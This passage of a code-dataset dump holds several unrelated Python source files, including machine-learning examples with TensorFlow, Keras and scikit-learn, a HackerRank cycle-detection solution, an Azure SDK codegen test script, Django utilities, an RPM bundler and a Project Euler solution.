tensorflow as tf\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# ------ Load and split the data ------\niris = load_iris()\niris_X = iris['data']\niris_y = pd.get_dummies(iris['target']) # One-hot encoding using Pandas\ntrain_X, test_X, train_Y, test_Y = train_test_split(iris_X,\n iris_y,\n test_size=0.3333,\n random_state=3437)\n\n# Create placeholders for passing data around the network\nnum_features = train_X.shape[1] # Second dimension of train_X\nnum_labels = train_Y.shape[1] # Second dimension of one-hot encoded labels.\n\nX = tf.compat.v1.placeholder(tf.float32, shape=(None, num_features))\nY_correct = tf.compat.v1.placeholder(tf.float32, shape=(None, num_labels))\n\n# Create weights and bias variables\nweights = tf.Variable(tf.random.normal((num_features, num_labels)))\nbiases = tf.Variable(tf.random.normal((num_labels,)))\n\n# Operations for logistic regression\n# 1. Multiply X by weights\n# 2. Add bias to product\n# 3. Apply sigmoid function to sum\nmult_op = tf.matmul(X, weights)\nadd_op = tf.add(mult_op, biases)\nsigmoid_op = tf.sigmoid(add_op)\n\n# Setting up learning duration (no. of epochs) and learning rate\nnum_epochs = 5000\nlearningRate = tf.compat.v1.train.exponential_decay(learning_rate=0.001,\n global_step=0,\n decay_steps=100,\n decay_rate=0.95,\n staircase=True)\n# Setting up loss function\nloss_val = tf.nn.l2_loss(sigmoid_op - Y_correct)\n\n# Setting up a single optimization step\n# - reducing the L2 norm between result from sigmoid operation\n# and correct label (one-hot encoded), using an exponentially \n# decaying learning rate.\nopt_out = tf.compat.v1.train.GradientDescentOptimizer(learningRate).minimize(loss_val)\n\nwith tf.compat.v1.Session() as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n # argmax(activation_OP, 1) returns the label with the most probability\n # argmax(yGold, 1) is the correct label\n correct_predictions_OP = tf.equal(tf.argmax(input=sigmoid_op,axis=1),tf.argmax(input=Y_correct,axis=1))\n\n # If every false prediction is 0 and every true prediction is 1, the average returns us the accuracy\n accuracy_OP = tf.reduce_mean(input_tensor=tf.cast(correct_predictions_OP, \"float\"))\n\n # Summary op for regression output\n activation_summary_OP = tf.compat.v1.summary.histogram(\"output\", sigmoid_op)\n\n # Summary op for accuracy\n accuracy_summary_OP = tf.compat.v1.summary.scalar(\"accuracy\", accuracy_OP)\n\n # Summary op for cost\n cost_summary_OP = tf.compat.v1.summary.scalar(\"cost\", loss_val)\n\n # Summary ops to check how variables (W, b) are updating after each iteration\n weightSummary = tf.compat.v1.summary.histogram(\"weights\", weights.eval(session=sess))\n biasSummary = tf.compat.v1.summary.histogram(\"biases\", biases.eval(session=sess))\n\n # Merge all summaries\n merged = tf.compat.v1.summary.merge([activation_summary_OP, accuracy_summary_OP, cost_summary_OP, weightSummary, biasSummary])\n\n # Summary writer\n writer = tf.compat.v1.summary.FileWriter(\"summary_logs\", sess.graph)\n cost = 0\n diff = 1\n epoch_values = []\n accuracy_values = []\n cost_values = []\n for ep in range(num_epochs):\n # Run training step\n step = sess.run(opt_out, feed_dict={X: train_X, Y_correct: train_Y})\n # Report occasional stats\n if ep % 100 == 0:\n # Add epoch to epoch_values\n epoch_values.append(ep)\n # Generate accuracy stats on test data\n train_accuracy, newCost = sess.run([accuracy_OP, loss_val], feed_dict={X: train_X, Y_correct: train_Y})\n # Add accuracy to live graphing variable\n accuracy_values.append(train_accuracy)\n # Add cost to live graphing variable\n cost_values.append(newCost)\n # Re-assign values for variables\n diff = abs(newCost - cost)\n cost = newCost\n\n #generate print statements\n print(\"Step %d, training accuracy %g, cost %g, change in cost %g\"%(ep, train_accuracy, newCost, diff))\n # How well do we perform on held-out test data?\n print(\"Final accuracy on test set: %s\" %\n str(sess.run(accuracy_OP, feed_dict={X: test_X, Y_correct: test_Y})))\n\nfig, ax1 = plt.subplots()\nax1.plot(cost_values, label='Cost function', color='red')\nplt.legend()\nax2 = ax1.twinx()\nax2.plot(accuracy_values, label='Accuracy', color='blue')\n# plt.plot(cost_values, label='Cost function')\n# plt.plot(accuracy_values, label='Accuracy')\nplt.legend()\nplt.show()\n","sub_path":"3_logistic_regression_tf2.py","file_name":"3_logistic_regression_tf2.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"232964192","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 13 22:37:26 2018\n\n@author: Sumeet Bhambrah\n\nHackerrank | Cracking the Coding Interview\n\nLinked Lists: Detect a cycle\nA linked list is said to contain a cycle if any node is visited more than once while traversing the list. \nComplete the function provided in the editor below.\nIt has one parameter: a pointer to a Node object named head that points to the head of a linked list.\nYour function must return a boolean denoting whether or not there is a cycle in the list.\nIf there is a cycle, return true; otherwise, return false.\nNote: If the list is empty, head will be null.\nInput Format\nOur hidden code checker passes the appropriate argument to your function. You are not responsible for reading any input from stdin.\n\nConstraints\n0<=list size<=100\n\nOutput Format\nIf the list contains a cycle, your function must return true. If the list does not contain a cycle, it must return false.\nThe binary integer corresponding to the boolean value returned by your function is printed to stdout by our hidden code checker.\nDetect a cycle in a linked list. Note that the head pointer may be 'None' if the list is empty.\n\n\"\"\"\n\n''' Note: Run the function code below in the Hackerrank console:\n https://www.hackerrank.com/challenges/ctci-linked-list-cycle/problem '''\n\ndef has_cycle(head):\n if(head):\n prev = {}\n current = head\n if(current.next == None):\n return False\n while(current):\n if current.next in prev:\n return True\n else:\n prev[current] = 1\n current = current.next\n return(False)\n return(False)\n \n \n","sub_path":"hackerrank/cracking the coding interview/linkedLists_detectACycle.py","file_name":"linkedLists_detectACycle.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"367255867","text":"#!/usr/bin/python3\n\nimport os\nimport sys, getopt\nimport os.path\nfrom os import path\n\nclean = False\ndebug = False\nwarning_color = '\\033[91m'\nend_color = '\\033[0m'\n\ndef execute_command(command):\n global debug\n if debug:\n print('Command: {command}'.format(command=command))\n return_value = os.system('%s 2>&1' % command)\n else:\n return_value = os.system('%s > /dev/null 2>&1' % command)\n return return_value\n\ndef cleanup(swagger_name):\n os.chdir('test/integration')\n os.system('rm -Rf azure-rest-api-specs')\n os.system('rm -Rf {swagger_name}'.format(swagger_name=swagger_name))\n os.system('rm -Rf azure-sdk-for-ios')\n os.chdir('../..')\n\ndef code_gen(swagger_name, swagger_spec_directory):\n print('Generate code for {swagger_name}.json'.format(swagger_name=swagger_name))\n os.chdir('test/integration/azure-rest-api-specs')\n if path.exists('../../{swagger_name}'.format(swagger_name=swagger_name)):\n os.rmdir('../../{swagger_name}'.format(swagger_name=swagger_name))\n os.chdir('{swagger_spec_directory}'.format(swagger_spec_directory=swagger_spec_directory))\n return_value = execute_command('autorest --input-file={swagger_name}.json --output-folder=../../../../../../../{swagger_name} --namespace={swagger_name} --use=../../../../../../../../../'.format(swagger_name=swagger_name))\n if return_value == 0:\n print(\"Code generation for {swagger_name}.json is sucessfull\".format(swagger_name=swagger_name))\n else:\n print(warning_color + \"Fail to code gen {swagger_name}.json\" + end_color)\n exit(1)\n os.chdir('../../../../../../../../../')\n\ndef update_repo():\n execute_command('git stash')\n execute_command('git checkout master')\n execute_command('git pull')\n\ndef setup_repo(repo):\n os.chdir('test/integration')\n\n if path.exists(repo):\n print(\"==Stach any changes and pull from master {repo}==\".format(repo=repo))\n os.chdir(repo)\n update_repo()\n os.chdir('..')\n else:\n print(\"==Clone {repo} repo==\".format(repo=repo))\n execute_command('git clone https://github.com/Azure/{repo}.git'.format(repo=repo))\n\n os.chdir('../..')\n\ndef compile_ios_sdk():\n print(\"==Compile azure-sdk-for-ios repo before adding generated code==\")\n os.chdir('test/integration/azure-sdk-for-ios')\n execute_command('pod install')\n return_value = execute_command('swift build')\n if return_value == 0:\n print(\"Azure ios sdk sucessfully compiled\")\n else:\n print(warning_color + \"Azure ios sdk failed to compile\" + end_color)\n exit(1)\n os.chdir('../../..')\n\ndef compile_ios_sdk_with_generated_code(swagger_name):\n os.chdir('test/integration/azure-sdk-for-ios')\n # Work aroud before the restructed generated code of chat sdk is push\n remove_directories = [\"Options\" , \"Util\", \"Models\"]\n for directory in remove_directories:\n if path.exists('sdk/communication/AzureCommunicationChat/Source/{name}'.format(name=directory)):\n os.system('rm -Rf sdk/communication/AzureCommunicationChat/Source/{name}'.format(name=directory))\n\n remove_files = ['AzureCommunicationChatClient.swift', 'AzureCommunicationChatService.swift']\n for file in remove_files:\n if path.exists('sdk/communication/AzureCommunicationChat/Source/{name}'.format(name=file)):\n os.remove('sdk/communication/AzureCommunicationChat/Source/{name}'.format(name=file))\n\n\n print(\"==Copy new generated code to azure-sdk-for-ios==\")\n execute_command('cp -r ../{swagger_name}/* sdk/communication/AzureCommunicationChat'.format(swagger_name=swagger_name))\n print(\"==Compile azure-sdk-for-ios repo with generated code==\")\n return_value = execute_command('swift build')\n if return_value == 0:\n print(\"Azure ios sdk with Generated code for communicationserviceschat sucessfully compiled\")\n else:\n print(warning_color + \"Azure ios sdk with Generated code for communicationserviceschat failed to compile\" + end_color)\n exit(1)\n\ndef main(argv):\n global clean\n global debug\n\n try:\n opts, args = getopt.getopt(argv,\"dc\", [\"debug\",\"clean\"])\n except getopt.GetoptError:\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"dc\", \"--debug\", \"--clean\"):\n debug = True\n if opt in (\"-c\", \"--clean\"):\n clean = True\n\n swagger_name = r'communicationserviceschat'\n swagger_spec_directory = r'specification/communication/data-plane/Microsoft.CommunicationServicesChat/preview/2020-09-21-preview2'\n if clean:\n cleanup(swagger_name)\n setup_repo(\"azure-sdk-for-ios\")\n setup_repo(\"azure-rest-api-specs\")\n compile_ios_sdk()\n code_gen(swagger_name, swagger_spec_directory)\n compile_ios_sdk_with_generated_code(swagger_name)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"scripts/test_chat_swagger.py","file_name":"test_chat_swagger.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"306400982","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n# @Author: Jola\n# @Time: 2019/5/30 15:25\n\n\nimport json\nimport os\n\nimport requests\nfrom fake_useragent import UserAgent\n\n\ndef get_fake_useragent(company=0):\n if os.path.exists(os.getcwd() + '/zhifo_spider/tools/fake_useragent.json'):\n return os.getcwd() + '/zhifo_spider/tools/fake_useragent.json'\n else:\n proxy = {}\n if company:\n proxy = {\n 'http': 'http://web-proxy.tencent.com:8080',\n 'https': 'http://web-proxy.tencent.com:8080',\n }\n res = requests.get('https://fake-useragent.herokuapp.com/browsers/0.1.11', proxies=proxy)\n with open(os.getcwd() + '/zhifo_spider/tools/fake_useragent.json', 'w', encoding='utf-8') as f:\n f.write(json.dumps(res.text))\n return os.getcwd() + '/zhifo_spider/tools/fake_useragent.json'\n\n\ndef get_header(company=0):\n location = get_fake_useragent(company)\n # print(location)\n ua = UserAgent(path=location)\n return ua.random\n\n\nif __name__ == '__main__':\n print(get_header())\n print(os.path.exists(os.getcwd() + '/fake_useragent.json'))\n\n","sub_path":"zhifo_spider/tools/get_ua.py","file_name":"get_ua.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"226614951","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='index'), #rota resp. por atender a requisicao,\n path('receitas/', receita, name='receita'),\n path('buscar', buscar, name='buscar'),\n path('cria/receita', cria_receita, name='cria_receita'),\n path('deleta/', deleta_receita, name='deleta_receita'),\n path('edita/', edita_receita, name='edita_receita'),\n path('atualiza-receita>', atualiza_receita, name='atualiza_receita')\n]\n\n","sub_path":"receitas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"347074457","text":"import django\nfrom django.conf.urls.defaults import *\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('events.views',\n (r'^$', 'index'),\n (r'^playem/(?P\\S+)/embed(?P\\d)/.*$', 'show_embed'),\n (r'^play/(?P\\S+)/$', 'play'),\n (r'^settz/$', 'set_timezone'),\n)\n\n\nurlpatterns += patterns('',\n (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"220180711","text":"import numpy as np\r\nimport keras\r\nfrom keras.models import Sequential,Input,Model\r\nfrom keras.models import load_model\r\nfrom keras.layers import Dense, Dropout, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.layers.advanced_activations import LeakyReLU\r\nfrom keras.utils import to_categorical\r\nfrom sklearn.model_selection import train_test_split\r\nimport os\r\nfrom time import time\r\n\r\nclass mds_dl:\r\n\tdef __init__(self):\r\n\t\tself.directory = '/home/leo/database/'\r\n\t\tself.test_file = './output/test.csv'\r\n\t\tself.nd = 128\r\n\t\tself.time_domain_bins = 25\r\n\t\tself.p_test = .1\t\t\t\t# Test samples percent\r\n\t\tself.p_validation = .15\t\t\t# Validation samples percent\r\n\r\n\tdef load(self):\r\n\t\tts=time()\r\n\t\tprint('Loading database...')\r\n\t\tdata_X = np.empty((0,self.nd*self.time_domain_bins), float)\r\n\t\tdata_Y = np.empty((0), int)\r\n\t\t\r\n\t\tfor root,dirs,files in os.walk(self.directory):\r\n\t\t\tfor file in files:\r\n\t\t\t\tif file.endswith(\".csv\"):\r\n\t\t\t\t\tprint('Loading '+file+'...')\r\n\t\t\t\t\tdata = np.genfromtxt(self.directory+file, delimiter=',')\r\n\t\t\t\t\tif file.startswith(\"x_\"):\r\n\t\t\t\t\t\tdata_X = np.append(data_X, data, axis=0)\r\n\t\t\t\t\telse: # y_\r\n\t\t\t\t\t\tdata_Y = np.append(data_Y, data)\r\n\t\t\t\t\tprint(data_X.shape, data_Y.shape)\r\n\r\n\t\tdata_X = data_X.reshape(-1, self.nd, self.time_domain_bins, 1)\r\n\t\tprint(data_X.shape)\r\n\t\tclasses = np.unique(data_Y)\r\n\t\tnClasses = len(classes)\r\n\r\n\t\tdata_Y_one_hot = to_categorical(data_Y)\r\n\r\n\t\ttrain_X, self.test_X, train_label, self.test_label = train_test_split(data_X, data_Y_one_hot, test_size=self.p_test, random_state=42)\r\n\t\tself.train_X, self.valid_X, self.train_label, self.valid_label = train_test_split(train_X, train_label, test_size=self.p_validation, random_state=13)\r\n\t\tprint('Training data shape:', self.train_X.shape, self.train_label.shape)\r\n\t\tprint('Validating data shape:', self.valid_X.shape, self.valid_label.shape)\r\n\t\tprint('Test data shape:', self.test_X.shape, self.test_label.shape)\r\n\t\tprint('Total data shape:', data_X.shape, data_Y.shape)\r\n\t\tprint('Total number of classes:', nClasses)\r\n\t\tprint('Load complete.')\r\n\t\tprint('Time cost:', time()-ts,'s')\r\n\r\n\tdef cnn(self):\r\n\t\tts=time()\r\n\t\tprint('Training using CNN...')\r\n\r\n\t\tbatch_size = 64\r\n\t\tepochs = 6\r\n\t\tnum_classes = self.train_label.shape[1]\r\n\r\n\t\tmodel = Sequential()\r\n\t\tmodel.add(Conv2D(32, kernel_size=(3, 3),activation='linear',input_shape=(self.nd, self.time_domain_bins, 1),padding='same'))\r\n\t\tmodel.add(LeakyReLU(alpha=0.1))\r\n\t\tmodel.add(MaxPooling2D((2, 2),padding='same'))\r\n\t\tmodel.add(Conv2D(64, (3, 3), activation='linear',padding='same'))\r\n\t\tmodel.add(LeakyReLU(alpha=0.1))\r\n\t\tmodel.add(MaxPooling2D(pool_size=(2, 2),padding='same'))\r\n\t\tmodel.add(Conv2D(128, (3, 3), activation='linear',padding='same'))\r\n\t\tmodel.add(LeakyReLU(alpha=0.1)) \r\n\t\tmodel.add(MaxPooling2D(pool_size=(2, 2),padding='same'))\r\n\t\tmodel.add(Flatten())\r\n\t\tmodel.add(Dense(128, activation='linear'))\r\n\t\tmodel.add(LeakyReLU(alpha=0.1)) \r\n\t\tmodel.add(Dense(num_classes, activation='softmax'))\r\n\r\n\t\tmodel.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(),metrics=['accuracy'])\r\n\r\n\t\tmodel.summary()\r\n\r\n\t\tmodel_train = model.fit(self.train_X, self.train_label, batch_size=batch_size,epochs=epochs,verbose=1,validation_data=(self.valid_X, self.valid_label))\r\n\r\n\t\ttest_eval = model.evaluate(self.test_X, self.test_label, verbose=0)\r\n\t\t\r\n\t\tprint(model_train.history)\r\n\t\tprint('Test loss:', test_eval[0])\r\n\t\tprint('Test accuracy:', test_eval[1])\r\n\t\tprint('Train complete.')\r\n\t\tprint('Time cost:', time()-ts,'s')\r\n\t\t# model_json = model.to_json()\r\n\t\t# with open('./output/model.json', 'w') as json_file:\r\n\t\t# \tjson_file.write(model_json)\r\n\t\t# model.save_weights('./output/model.h5')\r\n\t\tmodel.save('./output/mds_cnn_model.h5')\r\n\t\tprint('Saved model to disk.')\r\n\r\n\tdef model_predict(self):\r\n\t\t# json_file = open('./output/model.json', 'r')\r\n\t\t# loaded_model_json = json_file.read()\r\n\t\t# json_file.close()\r\n\t\t# loaded_model = model_from_json(loaded_model_json)\r\n\t\t# loaded_model.load_weights('./output/model.h5')\r\n\t\tloaded_model = load_model('./output/mds_cnn_model.h5')\r\n\t\tprint('Loaded model from disk.')\r\n\r\n\t\ttest_data = np.genfromtxt(self.test_file, delimiter=',')\r\n\t\ttest_data = test_data.reshape(-1, self.nd, self.time_domain_bins, 1)\r\n\t\tprint('Test data shape:',test_data.shape)\r\n\r\n\t\tpred = loaded_model.predict(test_data)\r\n\t\tprint(pred.shape)\r\n\t\tnp.savetxt('./output/pred.csv', pred, delimiter=',')\r\n\t\tprint('Saved.')\r\n\r\n\tdef main(self):\r\n\t\tself.load()\r\n\t\tself.cnn()\r\n\t\t# self.model_predict()\r\n\r\nif __name__ == '__main__':\r\n\tmds_dl().main()","sub_path":"scripts/ti_mds_cnn.py","file_name":"ti_mds_cnn.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"239571760","text":"# Jonas Colmsjö, 180129\n\n\n# Imports\n# =======\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn import metrics\n\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.feature_selection import SelectKBest, chi2, f_regression\n\nfrom sklearn.svm import LinearSVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.naive_bayes import MultinomialNB, GaussianNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.calibration import CalibratedClassifierCV\n\nfrom helpers import read_data\n\n\n# Constansts\n# ==========\n\nDATASET = '~/_stora_filer/tig113-projekt/all/application_train.csv'\n#DATASET = '~/_stora_filer/tig113-projekt/all/application_train-1pct.csv'\nNUM_FEATURES = None\n\n\n# Main\n# ====\n\nXtrain, Ytrain, Xtest, Ytest, df = read_data(DATASET, 0.7)\n\nif not NUM_FEATURES is None:\n print('Reducing the number of features to: ', NUM_FEATURES)\n clf = SelectKBest(f_regression, k=NUM_FEATURES).fit(Xtrain, Ytrain)\n Xtrain = clf.transform(Xtrain)\n Xtest = clf.transform(Xtest)\n\n# Get rid of ID and TARGET columns from df since the training data don't have these\ndf = df.drop([df.columns[1], df.columns[2]], axis=1)\ndf = df.columns[clf.get_support()]\nprint('The following columns were selected by SelectKBest\\n', df)\n\nclassifiers = [\n ('Dummy', DummyClassifier(strategy='most_frequent')),\n ('LinearSVC', LinearSVC()),\n ('SGD', SGDClassifier()), # loss=\"modified_huber\" gives predict_proba\n ('GradientBoosting', GradientBoostingClassifier()),\n# ('MultinomialNB', MultinomialNB()),\n ('GaussianNB', GaussianNB())\n# ('DecisionTree', DecisionTreeClassifier()),\n# ('RandomForest', RandomForestClassifier()),\n# ('Perceptron', Perceptron()),\n# ('LogisticRegression', LogisticRegression()),\n# ('MPLC', MLPClassifier(hidden_layer_sizes=(100,))),\n ]\n\nscores = {}\nroc_auc = {}\n\nfor alg, clf in classifiers:\n pipeline = make_pipeline(Imputer(), clf)\n scores[alg] = cross_validate(pipeline, Xtrain, Ytrain, return_train_score=True)\n pipeline.fit(Xtrain, Ytrain)\n predicted = pipeline.predict(Xtest)\n #scores[alg] = np.mean(predicted == Ytest)\n\n print('\\n\\n--- ' + alg + ' ---')\n print('Simple Mean Score: {:.3f}\\n'.format(np.mean(predicted == Ytest)))\n print('Classification report:\\n', metrics.classification_report(Ytest, predicted))\n print('Confusion matrix:\\n', metrics.confusion_matrix(Ytest, predicted))\n\n if alg != 'Perceptron' and alg != 'LinearSVC' and alg != 'SGD':\n Yscore = pipeline.predict_proba(Xtest)\n fpr, tpr, _ = roc_curve(Ytest, Yscore[:,1])\n roc_auc[alg] = auc(fpr, tpr)\n print('\\nROC AUC: ', roc_auc[alg])\n\n if alg == 'LinearSVC':\n cclf = CalibratedClassifierCV(base_estimator=pipeline)\n cclf.fit(Xtrain, Ytrain)\n Yscore = cclf.predict_proba(Xtest)\n fpr, tpr, _ = roc_curve(Ytest, Yscore[:,1])\n roc_auc[alg] = auc(fpr, tpr)\n print('\\nROC AUC: ', roc_auc[alg])\n\n\n#\n# Print the results\n#\n\nbest_alg, best_score = None, 0\nfor alg, score in scores.items():\n if np.average(score['test_score']) > best_score:\n best_score = np.average(score['test_score'])\n best_alg = alg\n print('{:<40}test score:{:<10.3f}train score:{:<10.3f}'.format(alg,\n np.average(score['test_score']),\n np.average(score['train_score'])))\n\nprint('*** The best algorithm {} has the ROC AUC score {:.3f} ***'.format(best_alg, best_score))\n","sub_path":"select_alg.py","file_name":"select_alg.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"569025123","text":"from tools.common.test import TestReporter\nfrom tools.devices.rigol_meter import RigolMode\nfrom tools.scenarious.scenario import Scenario\n\nLOAD_R = 4.7\nPS_R = 1\n\n\n# noinspection PyMethodParameters\nclass PSTestLoadDC(Scenario):\n def __init__(self):\n super().__init__(\"test_load\")\n\n def on_run(t):\n t.use_devboard()\n t.use_edpro_ps()\n t.use_meter()\n\n t.test_load_dc()\n t.test_load_short()\n\n def test_load_short(t):\n t.print_task(\"test_load_short\")\n t.devboard.set_off()\n t.edpro_ps.set_mode(\"dc\")\n t.edpro_ps.set_volt(5)\n initial = t.edpro_ps.get_values()\n t.check_abs(initial.U, 5, 0.1, \"Cannot set requiret voltage\")\n\n t.devboard.set_pp_load(0)\n t.wait(1)\n t.devboard.set_off()\n after = t.edpro_ps.get_values()\n t.check_abs(after.U, initial.U, 0.01, \"Voltage is not restored after shorting\")\n\n def test_load_dc(t):\n t.print_task(\"test_load_dc\")\n t.devboard.set_off()\n t.edpro_ps.set_mode(\"dc\")\n t.edpro_ps.set_volt(0)\n t.meter.set_mode(RigolMode.VDC_20)\n\n reporter = TestReporter(t.tag)\n\n for volt in [0.2, 0.4, 0.8, 2, 4, 5]:\n t.edpro_ps.set_volt(volt)\n initial_values = t.edpro_ps.get_values()\n t.check_abs(initial_values.U, volt, 0.1, \"Cannot set required voltage\")\n\n t.devboard.set_pp_load(2)\n t.wait(1.0)\n load_values = t.edpro_ps.get_values()\n t.devboard.set_off()\n\n t.check_abs(load_values.I, volt / (LOAD_R + PS_R), 0.2, \"Cannot set required current\")\n t.check_abs(initial_values.U, load_values.U, 0.05, \"Voltage under the load changes too much\")\n\n reporter.trace(f\"V: {volt}, actual: {initial_values.U}, load: {load_values.U}, I={load_values.I}\")\n\n reporter.print_result()\n t.success &= reporter.success\n\n\nif __name__ == \"__main__\":\n PSTestLoadDC().run()\n","sub_path":"tools/scenarious/ps_test_load_dc.py","file_name":"ps_test_load_dc.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"198463020","text":"# Copyright 2020 Alexis Lopez Zubieta\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\nimport logging\nimport fnmatch\nimport os\n\nfrom AppImageBuilder.app_dir.bundlers.bundler import Bundler\nfrom AppImageBuilder.commands.repoquery import RepoQuery\nfrom AppImageBuilder.commands.rpm_extract import RpmExtract\nfrom AppImageBuilder.commands.yumdownloader import YumDownloader\n\n\nclass YumError(RuntimeError):\n pass\n\n\nclass YumBundler(Bundler):\n def __init__(self, config):\n super().__init__(config)\n\n self.yum_downloader = YumDownloader()\n self.repoquery = RepoQuery()\n self.rpm_extract = RpmExtract()\n\n def run(self):\n download_list = self.repoquery.requires(self.config.include_list, self.config.arch)\n download_list.extend(self.config.include_list)\n download_list = [pkg for pkg in download_list if not self._is_excluded(pkg)]\n\n self.yum_downloader.download(download_list, self.config.archives_path)\n\n self._extract_packages_into_app_dir(app_dir_path)\n\n def _is_excluded(self, pkg):\n for exclude_expr in self.config.exclude_list:\n if fnmatch.fnmatch(pkg, exclude_expr):\n return True\n\n return False\n\n def _extract_packages_into_app_dir(self, app_dir_path):\n archives_dir_files = os.listdir(self.config.archives_path)\n rpm_files = [file for file in archives_dir_files if self._is_rpm_file(file)]\n\n for file_name in sorted(rpm_files):\n if not self._is_excluded(file_name):\n logging.info(\"Deploying: %s\" % file_name)\n\n file_path = os.path.join(self.config.archives_path, file_name)\n self.rpm_extract.extract(file_path, app_dir_path)\n else:\n logging.info('Excluding: %s' % file_name)\n\n def _is_rpm_file(self, file_name):\n return file_name.endswith('.rpm')\n\n def _get_package_name_from_fime(self, file_name):\n # http://ftp.rpm.org/max-rpm/ch-rpm-file-format.html\n # name-version-release.architecture.rpm\n return file_name[::-1].split('-', 2)[-1][::-1]\n","sub_path":"AppImageBuilder/app_dir/bundlers/yum/bundler.py","file_name":"bundler.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"182183756","text":"\nfrom django.db.models import EmailField\ntry:\n # from django_extensions.db.fields.json import JSONField\n raise ImportError\nexcept ImportError:\n import six\n from decimal import Decimal\n from django.db import models\n from django.conf import settings\n from django.core.serializers.json import DjangoJSONEncoder\n import json\n\n class JSONField(six.with_metaclass(models.SubfieldBase, models.TextField)):\n\n def __init__(self, *args, **kwargs):\n default = kwargs.get('default', None)\n if default is None:\n kwargs['default'] = '{}'\n elif isinstance(default, (list, dict)):\n kwargs['default'] = DjangoJSONEncoder().encode(default)\n models.TextField.__init__(self, *args, **kwargs)\n\n def to_python(self, value):\n if value is None or value == '':\n return {}\n elif isinstance(value, str) or isinstance(value, unicode):\n return json.loads(value, parse_float=Decimal, encoding=settings.DEFAULT_CHARSET)\n else:\n return value\n\n def get_db_prep_save(self, value, connection):\n #print value\n if not isinstance(value, (list, dict)):\n return super(JSONField, self).get_db_prep_save(\"\", connection=connection)\n else:\n return super(JSONField, self).get_db_prep_save(DjangoJSONEncoder().encode(value), connection=connection)\n\ntry:\n from south.modelsinspector import add_introspection_rules\n add_introspection_rules([], [\"^django_town\\.core\\.fields\\._EmailField\"])\n add_introspection_rules([], [\"^django_town\\.core\\.fields\\.JSONField\"])\nexcept ImportError:\n pass\n\n\nclass _EmailField(EmailField):\n\n def to_python(self, value):\n if value[0] == '#':\n return super(_EmailField, self).to_python(None)\n return super(_EmailField, self).to_python(value)\n\n def get_prep_value(self, value):\n return super(_EmailField, self).to_python(value)","sub_path":"django_town/core/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"283066612","text":"import urllib\n\ndic = {'a': 1,\n 'b': 2,\n 'c': 3,\n 'd': 4,\n 'e': 5,\n 'f': 6,\n 'g': 7,\n 'h': 8,\n 'i': 9,\n 'j': 10,\n 'k': 11,\n 'l': 12,\n 'm': 13,\n 'n': 14,\n 'o': 15,\n 'p': 16,\n 'q': 17,\n 'r': 18,\n 's': 19,\n 't': 20,\n 'u': 21,\n 'v': 22,\n 'w': 23,\n 'x': 24,\n 'y': 25,\n 'z': 26}\n\nurl = 'http://projecteuler.net/project/names.txt'\n\nuh = urllib.urlopen(url)\nsource = uh.read()\n\nsource = str(source)\nsource = source.replace('\\\"', '')\n\n\nlist = str(source).split(',')\nlist = sorted(list)\n\n\n\ndef score(name):\n scoreV = 0\n for i in range(len(name)):\n letter = name[i]\n letter = str(letter)\n letter = letter.lower()\n\n for key in dic:\n if letter == key:\n scoreV += dic[key]\n return scoreV\n\n\n\ntotal = 0\nfor v in range(len(list)):\n total += score(list[v]) * 